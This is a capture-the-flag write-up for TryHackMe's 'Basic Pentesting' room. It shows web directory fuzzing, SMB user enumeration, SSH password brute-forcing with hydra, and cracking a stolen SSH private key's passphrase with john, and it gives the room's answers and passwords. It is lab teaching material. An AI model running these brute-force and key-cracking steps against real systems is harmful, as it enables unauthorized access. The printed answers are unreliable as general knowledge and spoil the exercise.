writeups

Basic Pentesting - Write-up - TryHackMe

noraj (Alexandre ZANNI)
, , , , , , , , , ,
🇬🇧

Information

Room#

  • Name: Basic Pentesting
  • Profile: tryhackme.com
  • Difficulty: Easy
  • Description: This is a machine that allows you to practice web app hacking and privilege escalation

Basic Pentesting

Write-up

Overview#

Install tools used in this WU on BlackArch Linux:

1
pikaur -S ffuf enum4linux hydra john

[Task 1] Web App Testing and Privilege Escalation#

#3#

Deploy the machine and connect to our network

Answer: development 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ ffuf -r -u http://10.10.126.77/FUZZ -ac -c -v -w ~/CTF/tools/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.126.77/FUZZ
 :: Wordlist         : FUZZ: /home/noraj/CTF/tools/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt
 :: Follow redirects : true
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response size: 312
 :: Filter           : Response words: 22
 :: Filter           : Response lines: 12
________________________________________________

[Status: 200, Size: 158, Words: 20, Lines: 11]
| URL | http://10.10.126.77/.
    * FUZZ: .

[Status: 200, Size: 1131, Words: 72, Lines: 18]
| URL | http://10.10.126.77/development
    * FUZZ: development

:: Progress: [38267/38267] :: Job [1/1] :: 1291 req/sec :: Duration: [0:00:32] :: Errors: 0 ::

#5#

What is the username?

Answer: jan

With enum4linux we can enumerate users over SMB:

1
2
3
4
$ enum4linux 10.10.126.77
...
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

#6#

What is the password?

Answer: armando

With enum4linux we can see that default password policy is allowing a minimum password length of 5 characters.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ enum4linux 10.10.126.77
...
[+] Password Info for Domain: BASIC2

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

As we known the username we can try to bruteforce the password over ssh with [hydra]:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ hydra -l jan -P /usr/share/wordlists/passwords/rockyou.txt ssh://10.10.126.77
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-03 00:38:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.126.77:22/
[STATUS] 180.00 tries/min, 180 tries in 00:01h, 14344222 to do in 1328:11h, 16 active
[STATUS] 133.00 tries/min, 399 tries in 00:03h, 14344003 to do in 1797:30h, 16 active
[22][ssh] host: 10.10.126.77   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-03 00:44:54

#7#

What service do you use to access the server(answer in abbreviation in all caps)?

Answer: ssh

#9#

What is the name of the other user you found(all lower case)?

Answer: kay

#11#

What is the final password you obtain?

Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Kay SSH private key is readable by everyone so we can save it on our machine and change the permission so openssh won't complain:

1
$ chmod 600 kay.key

Then we can try to authenticate over SSH with this key:

1
2
$ ssh kay@10.10.126.77 -i kay.key 
Enter passphrase for key 'kay.key':

But for now we are blocked as the private key is encrypted and need a password to be unlocked.

We can try to crack the private key password with John The Ripper. First we have to convert the key in a format readable by john. Then we can try to bruteforce the password.

1
2
$ ssh2john kay.key 2&>0 > john.txt
$ john john.txt -w /usr/share/wordlists/passwords/rockyou.txt --format=ssh

The password of the key is beeswax.

Then we can read pass.bak where the password is stored.

Share